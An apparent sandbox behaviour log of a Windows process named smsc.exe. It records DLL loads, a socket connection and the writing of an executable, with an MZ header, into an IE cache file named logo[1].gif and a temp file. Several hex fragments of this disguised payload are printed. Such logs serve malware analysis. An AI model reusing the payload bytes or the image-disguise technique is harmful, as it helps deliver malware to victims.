Section loaded	Path: none Access: query and write and read Type: commit Baseaddress: 1470000 Size: 12288 Protection: read write Mapped to pid: own pid	success or wait	1765670120
Section loaded	Path: none Access: query and write and read Type: commit Baseaddress: 1470000 Size: 12288 Protection: read write Mapped to pid: own pid	success or wait	1765726505
Section loaded	Path: none Access: query and write and read Type: commit Baseaddress: 1470000 Size: 12288 Protection: read write Mapped to pid: own pid	success or wait	1765781800
Section loaded	Path: none Access: query and write and read Type: commit Baseaddress: 1470000 Size: 12288 Protection: read write Mapped to pid: own pid	success or wait	1765845198
Section loaded	Path: none Access: query and write and read Type: commit Baseaddress: 1470000 Size: 12288 Protection: read write Mapped to pid: own pid	success or wait	1765893693
Section loaded	Path: none Access: query and write and read Type: commit Baseaddress: 1470000 Size: 12288 Protection: read write Mapped to pid: own pid	success or wait	1765949806
Section loaded	Path: none Access: query and write and read Type: commit Baseaddress: 1470000 Size: 12288 Protection: read write Mapped to pid: own pid	success or wait	1766005553
Section loaded	Path: none Access: query and write and read Type: commit Baseaddress: 1470000 Size: 12288 Protection: read write Mapped to pid: own pid	success or wait	1766073104
Section loaded	Path: none Access: query and write and read Type: commit Baseaddress: 1470000 Size: 12288 Protection: read write Mapped to pid: own pid	success or wait	1766119662
Section loaded	Path: none Access: query and write and read Type: commit Baseaddress: 1470000 Size: 12288 Protection: read write Mapped to pid: own pid	success or wait	1766175288
Section loaded	Path: none Access: query and write and read Type: commit Baseaddress: 1470000 Size: 12288 Protection: read write Mapped to pid: own pid	success or wait	1766231523
Section loaded	Path: none Access: query and write and read Type: commit Baseaddress: 1470000 Size: 12288 Protection: read write Mapped to pid: own pid	success or wait	1766285190
Section loaded	Path: none Access: query and write and read Type: commit Baseaddress: 1470000 Size: 12288 Protection: read write Mapped to pid: own pid	success or wait	1766821984
Section loaded	Path: none Access: query and write and read Type: commit Baseaddress: 1470000 Size: 12288 Protection: read write Mapped to pid: own pid	success or wait	1766859016
Section loaded	Path: none Access: query and write and read Type: commit Baseaddress: 1470000 Size: 12288 Protection: read write Mapped to pid: own pid	success or wait	1766905926
Section loaded	Path: none Access: query and write and read Type: commit Baseaddress: 1470000 Size: 12288 Protection: read write Mapped to pid: own pid	success or wait	1766958109
Section loaded	Path: none Access: query and write and read Type: commit Baseaddress: 1470000 Size: 12288 Protection: read write Mapped to pid: own pid	success or wait	1767013611
Section loaded	Path: none Access: query and write and read Type: commit Baseaddress: 1470000 Size: 12288 Protection: read write Mapped to pid: own pid	success or wait	1767068275
Section loaded	Path: none Access: query and write and read Type: commit Baseaddress: 1470000 Size: 12288 Protection: read write Mapped to pid: own pid	success or wait	1767124133
Thread delayed	Time: 2 TID: 2376	success or wait	1767180328
Thread delayed	Time: 2 TID: 2376	success or wait	1774358668
Thread created	PID: 740 TID: 1716 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1781502868
Thread delayed	Time: 2 TID: 2376	success or wait	1781509046
Section loaded	Path: C:\WINDOWS\system32\dhcpcsvc.dll Access: query and write and read and execute Type: image Baseaddress: 7D4B0000 Size: 139264 Protection: read write Mapped to pid: own pid	success or wait	1783133092
Section loaded	Path: C:\WINDOWS\system32\netman.dll Access: query and write and read and execute Type: image Baseaddress: 77D00000 Size: 208896 Protection: read write Mapped to pid: own pid	success or wait	1783391500
Section loaded	Path: C:\WINDOWS\system32\mprapi.dll Access: query and write and read and execute Type: image Baseaddress: 76D40000 Size: 98304 Protection: read write Mapped to pid: own pid	success or wait	1783409601
Section loaded	Path: C:\WINDOWS\system32\activeds.dll Access: query and write and read and execute Type: image Baseaddress: 77CC0000 Size: 204800 Protection: read write Mapped to pid: own pid	success or wait	1783416579
Section loaded	Path: C:\WINDOWS\system32\adsldpc.dll Access: query and write and read and execute Type: image Baseaddress: 76E10000 Size: 151552 Protection: read write Mapped to pid: own pid	success or wait	1783424233
Section loaded	Path: C:\WINDOWS\system32\atl.dll Access: query and write and read and execute Type: image Baseaddress: 76B20000 Size: 69632 Protection: read write Mapped to pid: own pid	success or wait	1783450322
Section loaded	Path: C:\WINDOWS\system32\samlib.dll Access: query and write and read and execute Type: image Baseaddress: 71BF0000 Size: 77824 Protection: read write Mapped to pid: own pid	success or wait	1783492870
Section loaded	Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid	success or wait	1783505704
Section loaded	Path: C:\WINDOWS\system32\netshell.dll Access: query and write and read and execute Type: image Baseaddress: 76400000 Size: 1724416 Protection: read write Mapped to pid: own pid	success or wait	1783528730
Section loaded	Path: C:\WINDOWS\system32\credui.dll Access: query and write and read and execute Type: image Baseaddress: 76C00000 Size: 188416 Protection: read write Mapped to pid: own pid	success or wait	1783541251
Section loaded	Path: C:\WINDOWS\system32\dot3api.dll Access: query and write and read and execute Type: image Baseaddress: 478C0000 Size: 40960 Protection: read write Mapped to pid: own pid	success or wait	1783561777
Section loaded	Path: C:\WINDOWS\system32\dot3dlg.dll Access: query and write and read and execute Type: image Baseaddress: 736D0000 Size: 24576 Protection: read write Mapped to pid: own pid	success or wait	1783582904
Section loaded	Path: C:\WINDOWS\system32\onex.dll Access: query and write and read and execute Type: image Baseaddress: 5DCA0000 Size: 163840 Protection: read write Mapped to pid: own pid	success or wait	1783611990
Section loaded	Path: C:\WINDOWS\system32\wtsapi32.dll Access: query and write and read and execute Type: image Baseaddress: 76F50000 Size: 32768 Protection: read write Mapped to pid: own pid	success or wait	1783629828
Section loaded	Path: C:\WINDOWS\system32\winsta.dll Access: query and write and read and execute Type: image Baseaddress: 76360000 Size: 65536 Protection: read write Mapped to pid: own pid	success or wait	1783643756
Section loaded	Path: C:\WINDOWS\system32\crypt32.dll Access: query and write and read and execute Type: image Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid	success or wait	1783669566
Section loaded	Path: C:\WINDOWS\system32\msasn1.dll Access: query and write and read and execute Type: image Baseaddress: 77B20000 Size: 73728 Protection: read write Mapped to pid: own pid	success or wait	1783709566
Section loaded	Path: C:\WINDOWS\system32\eappcfg.dll Access: query and write and read and execute Type: image Baseaddress: 745B0000 Size: 139264 Protection: read write Mapped to pid: own pid	success or wait	1783737583
Section loaded	Path: C:\WINDOWS\system32\msvcp60.dll Access: query and write and read and execute Type: image Baseaddress: 76080000 Size: 413696 Protection: read write Mapped to pid: own pid	success or wait	1783751592
Section loaded	Path: C:\WINDOWS\system32\eappprxy.dll Access: query and write and read and execute Type: image Baseaddress: 5DCD0000 Size: 57344 Protection: read write Mapped to pid: own pid	success or wait	1783776420
Section loaded	Path: C:\WINDOWS\system32\wzcsapi.dll Access: query and write and read and execute Type: image Baseaddress: 73030000 Size: 65536 Protection: read write Mapped to pid: own pid	success or wait	1783819618
Section loaded	Path: C:\WINDOWS\system32\wzcsvc.dll Access: query and write and read and execute Type: image Baseaddress: 7DB10000 Size: 573440 Protection: read write Mapped to pid: own pid	success or wait	1783840005
Section loaded	Path: C:\WINDOWS\system32\wmi.dll Access: query and write and read and execute Type: image Baseaddress: 76D30000 Size: 16384 Protection: read write Mapped to pid: own pid	success or wait	1783866170
Section loaded	Path: C:\WINDOWS\system32\eapolqec.dll Access: query and write and read and execute Type: image Baseaddress: 72810000 Size: 45056 Protection: read write Mapped to pid: own pid	success or wait	1783881501
Section loaded	Path: C:\WINDOWS\system32\qutil.dll Access: query and write and read and execute Type: image Baseaddress: 726C0000 Size: 90112 Protection: read write Mapped to pid: own pid	success or wait	1783905603
Section loaded	Path: C:\WINDOWS\system32\esent.dll Access: query and write and read and execute Type: image Baseaddress: 606B0000 Size: 1101824 Protection: read write Mapped to pid: own pid	success or wait	1783928489
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 1470000 Size: 4096 Protection: execute Mapped to pid: own pid	success or wait	1784040569
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 1470000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	1784045495
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 1470000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	1784049615
Section loaded	Path: \BaseNamedObjects\AtlDebugAllocator_FileMappingNameStatic3_2e4 Access: query and write and read Type: reserve Baseaddress: 18E0000 Size: 4194304 Protection: read write Mapped to pid: own pid	success or wait	1784161867
Section loaded	Path: \BaseNamedObjects\AtlDebugAllocator_FileMappingNameStatic3_2e4 Access: query and write and read Type: reserve Baseaddress: 1D20000 Size: 4194304 Protection: read write Mapped to pid: own pid	success or wait	1784201058
Section loaded	Path: C:\WINDOWS\system32\netshell.dll Access: read Type: commit Baseaddress: 1D20000 Size: 1703936 Protection: readonly Mapped to pid: own pid	success or wait	1784242456
Section loaded	Path: \BaseNamedObjects\AtlDebugAllocator_FileMappingNameStatic3_2e4 Access: query and write and read Type: reserve Baseaddress: 1D60000 Size: 4194304 Protection: read write Mapped to pid: own pid	success or wait	1784369508
Thread delayed	Time: 2 TID: 2376	success or wait	1788656602
Section loaded	Path: unknown Access: unknown Type: unknown Baseaddress: 2060000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	1793740651
Section loaded	Path: unknown Access: unknown Type: unknown Baseaddress: 2070000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	1793751723
Section loaded	Path: C:\WINDOWS\system32\rpcss.dll Access: write and read and execute Type: commit Baseaddress: 2080000 Size: 401408 Protection: execute Mapped to pid: own pid	success or wait	1793791384
Section loaded	Path: C:\WINDOWS\system32\clbcatq.dll Access: query and write and read and execute Type: image Baseaddress: 76FD0000 Size: 520192 Protection: read write Mapped to pid: own pid	success or wait	1794559720
Section loaded	Path: C:\WINDOWS\system32\comres.dll Access: query and write and read and execute Type: image Baseaddress: 77050000 Size: 806912 Protection: read write Mapped to pid: own pid	success or wait	1794570525
File opened	Path: C:\WINDOWS\Registration\R000000000007.clb Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false	success or wait	1794637144
Section loaded	Path: C:\WINDOWS\system32\msxml3.dll Access: write and read and execute Type: commit Baseaddress: 2090000 Size: 1175552 Protection: execute Mapped to pid: own pid	success or wait	1794716137
Section loaded	Path: C:\WINDOWS\system32\msxml3.dll Access: query and write and read and execute Type: image Baseaddress: 74980000 Size: 1191936 Protection: read write Mapped to pid: own pid	success or wait	1794725483
Section loaded	Path: C:\WINDOWS\system32\msxml3r.dll Access: write and read and execute Type: commit Baseaddress: 2560000 Size: 45056 Protection: execute Mapped to pid: own pid	success or wait	1794859927
File opened	Path: C:\WINDOWS\system32\msxml3r.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false	success or wait	1795346089
Section loaded	Path: C:\WINDOWS\system32\msxml3r.dll Access: query and read Type: commit Baseaddress: 2560000 Size: 45056 Protection: readonly Mapped to pid: own pid	success or wait	1795355496
Thread created	PID: 740 TID: 732 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1796358570
Section loaded	Path: C:\WINDOWS\system32\msxml3.dll Access: write and read and execute Type: commit Baseaddress: 2190000 Size: 1175552 Protection: execute Mapped to pid: own pid	success or wait	1796411270
Section loaded	Path: C:\WINDOWS\system32\msxml3.dll Access: query and write and read and execute Type: image Baseaddress: 74980000 Size: 1191936 Protection: read write Mapped to pid: own pid	success or wait	1796415752
Section loaded	Path: C:\WINDOWS\system32\msxml3r.dll Access: write and read and execute Type: commit Baseaddress: 2660000 Size: 45056 Protection: execute Mapped to pid: own pid	success or wait	1796467672
File opened	Path: C:\WINDOWS\system32\msxml3r.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false	success or wait	1796469022
Section loaded	Path: C:\WINDOWS\system32\msxml3r.dll Access: query and read Type: commit Baseaddress: 2660000 Size: 45056 Protection: readonly Mapped to pid: own pid	success or wait	1796472792
File created	Path: C:\Documents and Settings\LocalService\IETldCache\ Access: read data or list directory and synchronize Options: directory file and synchronous io non alert and open for backup ident Attributes: normal Content Overwritten: false	success or wait	1796501382
File created	Path: C:\Documents and Settings\LocalService\IETldCache\index.dat Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file and random access Attributes: hidden and system and not contend indexed Content Overwritten: false	success or wait	1796511123
Section loaded	Path: \BaseNamedObjects\Local\C:_Documents and Settings_LocalService_IETldCache_index.dat_16384 Access: query and write and read Type: commit Baseaddress: 2690000 Size: 16384 Protection: read write Mapped to pid: own pid	success or wait	1796521658
File created	Path: C:\Documents and Settings\LocalService\IETldCache\index.dat Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file and random access Attributes: hidden and system and not contend indexed Content Overwritten: false	success or wait	1796545800
Section loaded	Path: \BaseNamedObjects\Local\C:_Documents and Settings_LocalService_IETldCache_index.dat_32768 Access: query and write and read Type: commit Baseaddress: 2690000 Size: 32768 Protection: read write Mapped to pid: own pid	success or wait	1796549068
File created	Path: C:\Documents and Settings\LocalService\IETldCache\index.dat Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file and random access Attributes: hidden and system and not contend indexed Content Overwritten: false	success or wait	1796559800
Section loaded	Path: \BaseNamedObjects\Local\C:_Documents and Settings_LocalService_IETldCache_index.dat_49152 Access: query and write and read Type: commit Baseaddress: 2690000 Size: 49152 Protection: read write Mapped to pid: own pid	success or wait	1796562205
File created	Path: C:\Documents and Settings\LocalService\IETldCache\index.dat Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file and random access Attributes: hidden and system and not contend indexed Content Overwritten: false	success or wait	1796579205
Section loaded	Path: \BaseNamedObjects\Local\C:_Documents and Settings_LocalService_IETldCache_index.dat_65536 Access: query and write and read Type: commit Baseaddress: 2690000 Size: 65536 Protection: read write Mapped to pid: own pid	success or wait	1796581573
File created	Path: C:\Documents and Settings\LocalService\IETldCache\index.dat Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file and random access Attributes: hidden and system and not contend indexed Content Overwritten: false	success or wait	1796594819
Section loaded	Path: \BaseNamedObjects\Local\C:_Documents and Settings_LocalService_IETldCache_index.dat_81920 Access: query and write and read Type: commit Baseaddress: 2690000 Size: 81920 Protection: read write Mapped to pid: own pid	success or wait	1796598970
File created	Path: C:\Documents and Settings\LocalService\IETldCache\index.dat Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file and random access Attributes: hidden and system and not contend indexed Content Overwritten: false	success or wait	1796617809
Section loaded	Path: \BaseNamedObjects\Local\C:_Documents and Settings_LocalService_IETldCache_index.dat_98304 Access: query and write and read Type: commit Baseaddress: 2690000 Size: 98304 Protection: read write Mapped to pid: own pid	success or wait	1796620185
File created	Path: C:\Documents and Settings\LocalService\IETldCache\index.dat Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file and random access Attributes: hidden and system and not contend indexed Content Overwritten: false	success or wait	1796632626
Section loaded	Path: \BaseNamedObjects\Local\C:_Documents and Settings_LocalService_IETldCache_index.dat_114688 Access: query and write and read Type: commit Baseaddress: 2690000 Size: 114688 Protection: read write Mapped to pid: own pid	success or wait	1796634934
File created	Path: C:\Documents and Settings\LocalService\IETldCache\index.dat Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file and random access Attributes: hidden and system and not contend indexed Content Overwritten: false	success or wait	1796647499
Section loaded	Path: \BaseNamedObjects\Local\C:_Documents and Settings_LocalService_IETldCache_index.dat_131072 Access: query and write and read Type: commit Baseaddress: 2690000 Size: 131072 Protection: read write Mapped to pid: own pid	success or wait	1796650419
File created	Path: C:\Documents and Settings\LocalService\IETldCache\index.dat Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file and random access Attributes: hidden and system and not contend indexed Content Overwritten: false	success or wait	1797052216
Section loaded	Path: \BaseNamedObjects\Local\C:_Documents and Settings_LocalService_IETldCache_index.dat_147456 Access: query and write and read Type: commit Baseaddress: 2690000 Size: 147456 Protection: read write Mapped to pid: own pid	success or wait	1797056676
File created	Path: C:\Documents and Settings\LocalService\IETldCache\index.dat Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file and random access Attributes: hidden and system and not contend indexed Content Overwritten: false	success or wait	1797197687
Section loaded	Path: \BaseNamedObjects\Local\C:_Documents and Settings_LocalService_IETldCache_index.dat_163840 Access: query and write and read Type: commit Baseaddress: 2690000 Size: 163840 Protection: read write Mapped to pid: own pid	success or wait	1797206330
File created	Path: C:\Documents and Settings\LocalService\IETldCache\index.dat Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file and random access Attributes: hidden and system and not contend indexed Content Overwritten: false	success or wait	1797250742
Section loaded	Path: \BaseNamedObjects\Local\C:_Documents and Settings_LocalService_IETldCache_index.dat_180224 Access: query and write and read Type: commit Baseaddress: 2690000 Size: 180224 Protection: read write Mapped to pid: own pid	success or wait	1797257266
File created	Path: C:\Documents and Settings\LocalService\IETldCache\index.dat Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file and random access Attributes: hidden and system and not contend indexed Content Overwritten: false	success or wait	1797296416
Section loaded	Path: \BaseNamedObjects\Local\C:_Documents and Settings_LocalService_IETldCache_index.dat_196608 Access: query and write and read Type: commit Baseaddress: 2690000 Size: 196608 Protection: read write Mapped to pid: own pid	success or wait	1797302777
File created	Path: C:\Documents and Settings\LocalService\IETldCache\index.dat Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file and random access Attributes: hidden and system and not contend indexed Content Overwritten: false	success or wait	1797351808
Section loaded	Path: \BaseNamedObjects\Local\C:_Documents and Settings_LocalService_IETldCache_index.dat_212992 Access: query and write and read Type: commit Baseaddress: 2690000 Size: 212992 Protection: read write Mapped to pid: own pid	success or wait	1797359071
File created	Path: C:\Documents and Settings\LocalService\IETldCache\index.dat Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file and random access Attributes: hidden and system and not contend indexed Content Overwritten: false	success or wait	1797394245
Section loaded	Path: \BaseNamedObjects\Local\C:_Documents and Settings_LocalService_IETldCache_index.dat_229376 Access: query and write and read Type: commit Baseaddress: 2690000 Size: 229376 Protection: read write Mapped to pid: own pid	success or wait	1797396995
File created	Path: C:\Documents and Settings\LocalService\IETldCache\index.dat Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file and random access Attributes: hidden and system and not contend indexed Content Overwritten: false	success or wait	1797412627
Section loaded	Path: \BaseNamedObjects\Local\C:_Documents and Settings_LocalService_IETldCache_index.dat_245760 Access: query and write and read Type: commit Baseaddress: 2690000 Size: 245760 Protection: read write Mapped to pid: own pid	success or wait	1797415103
File created	Path: C:\Documents and Settings\LocalService\IETldCache\index.dat Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file and random access Attributes: hidden and system and not contend indexed Content Overwritten: false	success or wait	1797427279
Section loaded	Path: \BaseNamedObjects\Local\C:_Documents and Settings_LocalService_IETldCache_index.dat_262144 Access: query and write and read Type: commit Baseaddress: 2690000 Size: 262144 Protection: read write Mapped to pid: own pid	success or wait	1797429712
Section loaded	Path: \BaseNamedObjects\Local\UrlZonesSM_SYSTEM Access: query and write and read Type: commit Baseaddress: 2190000 Size: 4096 Protection: read write Mapped to pid: own pid	success or wait	1797463519
File opened	Path: \Device\Afd\AsyncConnectHlp Access: synchronize and generic read and generic write Options: no options Attributes: none Content Overwritten: true	success or wait	1797528102
Thread delayed	Time: 12 TID: 9494	success or wait	1800233896
File created	Path: C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\4V74E6Q7\logo[1].gif Access: read attributes and synchronize and generic write Options: synchronous io non alert and non directory file Attributes: not contend indexed Content Overwritten: false	success or wait	1809790062
File created	Path: C:\WINDOWS\TEMP\pac_00603.tmp Access: read attributes and synchronize and generic write Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false	success or wait	1809806435
File write	Path: C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\4V74E6Q7\logo[1].gif Offset: none Length: 514 Value: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D8 00 00 00 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F 74 20 62 65	success or wait	1810311319
File write	Path: C:\WINDOWS\Temp\pac_00603.tmp Offset: none Length: 514 Value: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D8 00 00 00 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F 74 20 62 65	success or wait	1810314615
File write	Path: C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\4V74E6Q7\logo[1].gif Offset: none Length: 514 Value: 00 00 00 EF 03 00 80 05 00 00 00 EF 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 48 2E 64 61 74 61 00 00 00 A4 A4 00 00 80 F4 03 00 00 A5 00 00 80 F4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C8 50 41 47 45 00 00 00 00 2B 1F 00 00 80 99 04 00 80 1F 00 00 80 99 04 00 00 00 00 00 00 00	success or wait	1810318684
File write	Path: C:\WINDOWS\Temp\pac_00603.tmp Offset: none Length: 514 Value: 00 00 00 EF 03 00 80 05 00 00 00 EF 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 48 2E 64 61 74 61 00 00 00 A4 A4 00 00 80 F4 03 00 00 A5 00 00 80 F4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C8 50 41 47 45 00 00 00 00 2B 1F 00 00 80 99 04 00 80 1F 00 00 80 99 04 00 00 00 00 00 00 00	success or wait	1810326865
File write	Path: C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\4V74E6Q7\logo[1].gif Offset: none Length: 514 Value: E8 7C FF FF FF 8B C8 BA 28 43 05 00 87 0A 2B C1 85 C0 7E 0E B9 C8 00 00 00 3B C1 0F 8D 77 A2 02 00 C3 33 C0 EB FB 90 90 90 90 90 8B FF 55 8B EC 83 EC 60 56 33 F6 39 35 98 98 05 00 89 75 E8 89 75 CC 0F 85 7D EA 00 00 53 57 64 0F B6 05 51 00 00 00 3B C6 89 45 E4 0F 85 54 0F 00 00 FF 15 6C F0 04 00 8B	success or wait	1810702000
File write	Path: C:\WINDOWS\Temp\pac_00603.tmp Offset: none Length: 514 Value: E8 7C FF FF FF 8B C8 BA 28 43 05 00 87 0A 2B C1 85 C0 7E 0E B9 C8 00 00 00 3B C1 0F 8D 77 A2 02 00 C3 33 C0 EB FB 90 90 90 90 90 8B FF 55 8B EC 83 EC 60 56 33 F6 39 35 98 98 05 00 89 75 E8 89 75 CC 0F 85 7D EA 00 00 53 57 64 0F B6 05 51 00 00 00 3B C6 89 45 E4 0F 85 54 0F 00 00 FF 15 6C F0 04 00 8B	success or wait	1810703703
File write	Path: C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\4V74E6Q7\logo[1].gif Offset: none Length: 514 Value: 45 C0 89 08 A1 88 96 05 00 8D 8C 07 FC 0F 00 00 89 75 C4 FF D3 A1 88 96 05 00 8D 8C 07 FC 0F 00 00 FF 15 BC F1 04 00 A1 88 96 05 00 8B 4D BC 03 F0 3B CE 0F 85 67 79 00 00 8B 45 C0 89 41 04 8B 45 C0 8B 4D BC 89 08 A1 88 96 05 00 8D 8C 07 FC 0F 00 00 FF D3 8B 45 DC FF 45 F8 66 8B C8 66 81 E9 FE 01 40	success or wait	1810706244
File write	Path: C:\WINDOWS\Temp\pac_00603.tmp Offset: none Length: 514 Value: 45 C0 89 08 A1 88 96 05 00 8D 8C 07 FC 0F 00 00 89 75 C4 FF D3 A1 88 96 05 00 8D 8C 07 FC 0F 00 00 FF 15 BC F1 04 00 A1 88 96 05 00 8B 4D BC 03 F0 3B CE 0F 85 67 79 00 00 8B 45 C0 89 41 04 8B 45 C0 8B 4D BC 89 08 A1 88 96 05 00 8D 8C 07 FC 0F 00 00 FF D3 8B 45 DC FF 45 F8 66 8B C8 66 81 E9 FE 01 40	success or wait	1810707547
File write	Path: C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\4V74E6Q7\logo[1].gif Offset: none Length: 514 Value: 47 1E 8B 77 08 8B 5C 38 10 33 C9 3B F1 89 4D 0C 89 75 FC 74 49 F6 46 06 05 74 34 8B 46 0C 8B 4E 14 8B D1 8B 36 85 F6 75 30 8D 75 0C 56 FF 75 FC 2B CB 51 2B D3 52 8D 0C 18 51 53 50 57 FF 75 08 E8 24 00 00 00 8B 45 0C 5F 5E 5B C9 C2 08 00 51 56 FF 15 78 F1 04 00 EB C5 03 4E 14 EB C5 33 C0 33 D2 EB C5	success or wait	1810709631
File write	Path: C:\WINDOWS\Temp\pac_00603.tmp Offset: none Length: 514 Value: 47 1E 8B 77 08 8B 5C 38 10 33 C9 3B F1 89 4D 0C 89 75 FC 74 49 F6 46 06 05 74 34 8B 46 0C 8B 4E 14 8B D1 8B 36 85 F6 75 30 8D 75 0C 56 FF 75 FC 2B CB 51 2B D3 52 8D 0C 18 51 53 50 57 FF 75 08 E8 24 00 00 00 8B 45 0C 5F 5E 5B C9 C2 08 00 51 56 FF 15 78 F1 04 00 EB C5 03 4E 14 EB C5 33 C0 33 D2 EB C5	success or wait	1810739301
File write	Path: C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\4V74E6Q7\logo[1].gif Offset: none Length: 514 Value: 75 0F 80 7D 0C 00 74 09 46 3B 35 0C FC 04 00 72 BC A1 88 3E 05 00 8D 44 07 04 83 C9 FF F0 0F C1 08 5E 5B 5F C9 C2 08 00 66 81 FA 06 08 0F 85 90 00 00 00 8B 55 08 50 2B C8 51 03 C7 50 FF 75 14 8D 54 96 48 FF 75 10 FF 02 56 E8 B1 04 00 00 E9 C6 FE FF FF 90 90 90 90 90 8B FF 55 8B EC 53 56 8B 75 08 83	success or wait	1810816575
File write	Path: C:\WINDOWS\Temp\pac_00603.tmp Offset: none Length: 514 Value: 75 0F 80 7D 0C 00 74 09 46 3B 35 0C FC 04 00 72 BC A1 88 3E 05 00 8D 44 07 04 83 C9 FF F0 0F C1 08 5E 5B 5F C9 C2 08 00 66 81 FA 06 08 0F 85 90 00 00 00 8B 55 08 50 2B C8 51 03 C7 50 FF 75 14 8D 54 96 48 FF 75 10 FF 02 56 E8 B1 04 00 00 E9 C6 FE FF FF 90 90 90 90 90 8B FF 55 8B EC 53 56 8B 75 08 83	success or wait	1810818736
File write	Path: C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\4V74E6Q7\logo[1].gif Offset: none Length: 514 Value: 85 66 6A 02 00 8B 46 0C 39 B8 C8 00 00 00 0F 85 A7 05 00 00 8B 46 0C 39 B8 C4 00 00 00 0F 85 6C 6A 02 00 8B 46 0C 8D 88 C0 00 00 00 A1 10 14 05 00 39 01 0F 87 65 6A 02 00 8B 46 0C F6 80 B4 00 00 00 04 0F 85 5C 6A 02 00 8B 46 04 89 45 FC 8B 46 0C 8B 98 AC 00 00 00 8B 80 C0 00 00 00 83 EB 20 89 45 DC	success or wait	1811483646
File write	Path: C:\WINDOWS\Temp\pac_00603.tmp Offset: none Length: 514 Value: 85 66 6A 02 00 8B 46 0C 39 B8 C8 00 00 00 0F 85 A7 05 00 00 8B 46 0C 39 B8 C4 00 00 00 0F 85 6C 6A 02 00 8B 46 0C 8D 88 C0 00 00 00 A1 10 14 05 00 39 01 0F 87 65 6A 02 00 8B 46 0C F6 80 B4 00 00 00 04 0F 85 5C 6A 02 00 8B 46 04 89 45 FC 8B 46 0C 8B 98 AC 00 00 00 8B 80 C0 00 00 00 83 EB 20 89 45 DC	success or wait	1811485302
File write	Path: C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\4V74E6Q7\logo[1].gif Offset: none Length: 514 Value: 90 8B FF 55 8B EC 51 51 53 8B 5D 08 8B C3 69 C0 6D 4E C6 41 05 39 30 00 00 33 D2 6A 1F 59 F7 F1 8B C3 C1 E8 1D 6B C0 1F 03 D0 8D 14 95 60 37 05 00 8B 02 85 C0 89 55 F8 0F 84 22 13 00 00 8B CB C1 E1 03 33 C8 F7 C1 F8 FF FF FF 0F 85 0F 13 00 00 83 E0 07 8A 80 DC F2 04 00 5B C9 C2 04 00 90 90 90 90 90	success or wait	1811488640
File write	Path: C:\WINDOWS\Temp\pac_00603.tmp Offset: none Length: 514 Value: 90 8B FF 55 8B EC 51 51 53 8B 5D 08 8B C3 69 C0 6D 4E C6 41 05 39 30 00 00 33 D2 6A 1F 59 F7 F1 8B C3 C1 E8 1D 6B C0 1F 03 D0 8D 14 95 60 37 05 00 8B 02 85 C0 89 55 F8 0F 84 22 13 00 00 8B CB C1 E1 03 33 C8 F7 C1 F8 FF FF FF 0F 85 0F 13 00 00 83 E0 07 8A 80 DC F2 04 00 5B C9 C2 04 00 90 90 90 90 90	success or wait	1811493975
